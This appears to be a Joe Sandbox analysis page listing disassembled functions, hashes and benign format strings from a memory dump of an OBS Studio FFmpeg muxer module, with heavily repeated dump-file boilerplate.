Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %d channels
API String ID: 0-1351059727
Opcode ID: fb37549d1e1a87d1845128c91bcf027e9804e02a172115fddd54d2ad187c1367
Instruction ID: 8e7e5d3e939508498bf9b0966c397bd95f1403badc4e2ab6dad409756cec2b27
Opcode Fuzzy Hash: fb37549d1e1a87d1845128c91bcf027e9804e02a172115fddd54d2ad187c1367
Instruction Fuzzy Hash: 1B41D2B3F0A94662EB198E05BC02A6E1682EF94BF6F48D032DD0946B44FD3C9587E300

Function 00007FF8A7C22B60 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

%02u:%02u:%02u%c%02u, xrefs: 00007FF8A7C22C47

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %02u:%02u:%02u%c%02u
API String ID: 0-3773705257
Opcode ID: 05e44b18eb7a4dcf895f83e0c2975131c3305643ef67c3862a7710349e35a628
Instruction ID: 75d4ca458e715c338658c8846061788336f56ba9bb508a109a946bfd3ce202ad
Opcode Fuzzy Hash: 05e44b18eb7a4dcf895f83e0c2975131c3305643ef67c3862a7710349e35a628
Instruction Fuzzy Hash: F031BFB3F2A5555AFB25EE159C4076E2243F7447C9F898230ED0A4B758F93CE948E380

Function 00007FF8A7BEE9A0 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

9%lld, xrefs: 00007FF8A7BEEADF

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: 9%lld
API String ID: 0-1067827528
Opcode ID: 4bf4b89b430cf95bf7994c152801e5258dcff788620b942f10691eac737950a8
Instruction ID: aac66258bdf9d8bbe593212eeb384ab8e848b3510220f25eee4c8d1ae21ae9cf
Opcode Fuzzy Hash: 4bf4b89b430cf95bf7994c152801e5258dcff788620b942f10691eac737950a8
Instruction Fuzzy Hash: A231C1A373594153E757CEA6A8552ED2792F3897CAF84A032FE0B87348E679DD06E100

Function 00007FF8A7BEE820 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

9%lld, xrefs: 00007FF8A7BEE95C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: 9%lld
API String ID: 0-1067827528
Opcode ID: b7dcea320b78e429be7da6e3a51ac97eece9d04196250d78cf97526035406e98
Instruction ID: 75482ecd64307d908e3b8eb0fcbb6389021084f7207d39a09ea618319d133096
Opcode Fuzzy Hash: b7dcea320b78e429be7da6e3a51ac97eece9d04196250d78cf97526035406e98
Instruction Fuzzy Hash: 8431C6A373195557E752CEA6A4556ED2752F34D7CAFC46032FE0AC7344EA78CD0AE200

Function 00007FF8A7C22CC0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

%02u:%02u:%02u%c%02u, xrefs: 00007FF8A7C22D5D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %02u:%02u:%02u%c%02u
API String ID: 0-3773705257
Opcode ID: fdd9d13a151395552cd65e209512f394c3a647e9cf21eb926f75bca4cb5d8e29
Instruction ID: 4b6e3259478d8558f6cdb222d693cf0b15c1885c81add3b4f7680caea484ecba
Opcode Fuzzy Hash: fdd9d13a151395552cd65e209512f394c3a647e9cf21eb926f75bca4cb5d8e29
Instruction Fuzzy Hash: D4112773528445469B49EF1A88116AD7691F390BC4FC84235EA9BCF344ED3CD709D704

Function 00007FF8A7BEB6A0 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

front left, xrefs: 00007FF8A7BEB743

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: front left
API String ID: 0-959785498
Opcode ID: 23cad181ecbb07febb14ec29e22a05d1089456614179c0b502e2ad97e0cb5eae
Instruction ID: 4d31757ca64a0e2d7078b6bc562258033afbf3fc6c0adc04d079d2808b5c6865
Opcode Fuzzy Hash: 23cad181ecbb07febb14ec29e22a05d1089456614179c0b502e2ad97e0cb5eae
Instruction Fuzzy Hash: 8F11E7D7F3656A43EB604A2DCC01B5901C2D7957A174CD131E809C2F44FC3DE6429642

Function 00007FF8A7C087F0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A7C08819

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 30d0097c098d0a2c9e6ec4e870c0f712385f61fe009233d20c93c0c5dbd3fad9
Instruction ID: 5a35b87c3d5627300d083c20869375d040a3629af69b65da947ff4898fc4da88
Opcode Fuzzy Hash: 30d0097c098d0a2c9e6ec4e870c0f712385f61fe009233d20c93c0c5dbd3fad9
Instruction Fuzzy Hash: 4311B2A2711B4C52AD08C7AAA8B68B9925AA3ADFD4718F032CE0D5B354DD3CE091C340

Function 00007FF8A7C14920 Relevance: 1.0, Instructions: 994COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e651fe4c88c82812c6238caf3bdcde6ab459b46390ea8f8b4a9699f07545262f
Instruction ID: 1bda1fb4674d5b31257bf7ffee1b08a0ed086879fa134946f1178f46d8c42b44
Opcode Fuzzy Hash: e651fe4c88c82812c6238caf3bdcde6ab459b46390ea8f8b4a9699f07545262f
Instruction Fuzzy Hash: 6572EAB7B251204BE354CF2AE844E46BB92F7D8748B56A114EE56E7F04D23DEA06CF40

Function 00007FF8A7C13C00 Relevance: 1.0, Instructions: 989COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d4f91dbcd3920678f56ce2ea7d672d73a39a89e5afe551f032633b1d0d58bd
Instruction ID: 964c822f9f187339aa42b2d0479b64a4cd5d221fa53f8ffe4ad9e35da9718a6b
Opcode Fuzzy Hash: f1d4f91dbcd3920678f56ce2ea7d672d73a39a89e5afe551f032633b1d0d58bd
Instruction Fuzzy Hash: A0720977B282244B9318CF26E809D4AB796F7D4704B469128EF16D7F08E67DEA058F84

Function 00007FF8A7C03580 Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a118a507555301ea384540139cf8e1fb3b65300ff54bfeb7e4b20e0f2e86e279
Instruction ID: 825945a5556259f70749e368445f0b23942f52eca5ab352ec8e4b425672cc25c
Opcode Fuzzy Hash: a118a507555301ea384540139cf8e1fb3b65300ff54bfeb7e4b20e0f2e86e279
Instruction Fuzzy Hash: 0A52066361D2A186E3648F69A400B3FF6A1FBD4781F10A129EFC993B99E73CD540DB50

Function 00007FF8A7C06820 Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36dddfe8cf3ff9be88c3b72cff50abe549f3a298be1906c93472ea6cf2cfdb2f
Instruction ID: 007f1cdac85b1506e5642b27f7d6de429fec37263e68defc195738d4fe4c1d0b
Opcode Fuzzy Hash: 36dddfe8cf3ff9be88c3b72cff50abe549f3a298be1906c93472ea6cf2cfdb2f
Instruction Fuzzy Hash: 7912A377B6016047D76CCF36E816F993796E399758389E12C9A02D7F08DA3DD90ACB80

Function 00007FF8A7C23560 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8160ea691a23e1b632a407eca822979379531e44aeec8686b9d2442b5e3ae57d
Instruction ID: e355a2c61ded5fb36f52494d659d3e468a2e4d016f01e8ff13a5ab7e0ee8a32e
Opcode Fuzzy Hash: 8160ea691a23e1b632a407eca822979379531e44aeec8686b9d2442b5e3ae57d
Instruction Fuzzy Hash: AA22C272B2AA4592DB60EF16E44492E7769FB85FC4B518136EF5E8B744DF38E400E380

Function 00007FF8A7C2CBE0 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff40ba625cf61736bb64c8bdf5840a366f4253e3d55665abfb5f43b414cbf64c
Instruction ID: 0aad16de59d5f99e6ef9f203eebbdea646d0e7253b1ff685105ca5ddef630061
Opcode Fuzzy Hash: ff40ba625cf61736bb64c8bdf5840a366f4253e3d55665abfb5f43b414cbf64c
Instruction Fuzzy Hash: 9722C462E29F904ED353CE75945223A6B58FFA67C4B41D323EE4B76B12DB34E5868200

Function 00007FF8A7C109B0 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0debf0142da6a9273804bc82d00e17f960341957d4bf9a7368440b236c8168
Instruction ID: 2ad341d6817ac2dca6a57e0e8f244b59258a04ef193d7ce7795660a876ef74cd
Opcode Fuzzy Hash: 5d0debf0142da6a9273804bc82d00e17f960341957d4bf9a7368440b236c8168
Instruction Fuzzy Hash: E702E273F9AA91B6EB758F10A102E7C7FA0FB50B85F559039D74E13B80DA38A955E300

Function 00007FF8A7C42B80 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5050afa32f6ddfb6a114996f9f218715255f7c7b544984919c9caa6235c0bb16
Instruction ID: e2b680fe19b0c9c06e55166ed6ccba07f906bd679ce67be724260e69ff4a7c55
Opcode Fuzzy Hash: 5050afa32f6ddfb6a114996f9f218715255f7c7b544984919c9caa6235c0bb16
Instruction Fuzzy Hash: 39221432E28A8C96C712CE77948517D3B10FBAE7C4B59EB16EE05727A2DB34F1849700

Function 00007FF8A7BE7260 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81a7950f2253a1c48c8c137fbc100e25f2fe9e5a0653b74c0b8ed70f9fb77fc6
Instruction ID: 880753f4b1e7438386be3a51d789a5e5db7a55ccdead1d12a386dab50ea39a3e
Opcode Fuzzy Hash: 81a7950f2253a1c48c8c137fbc100e25f2fe9e5a0653b74c0b8ed70f9fb77fc6
Instruction Fuzzy Hash: 3C1284732108148BD391CF5EE8C0E5DB7D1F798B4EB629324EB4693B61D632A863D790

Function 00007FF8A7C11160 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7b787218cfe6dc98328e18f40f484bb36194aafcb0adaf6dc1dee95f7ee729
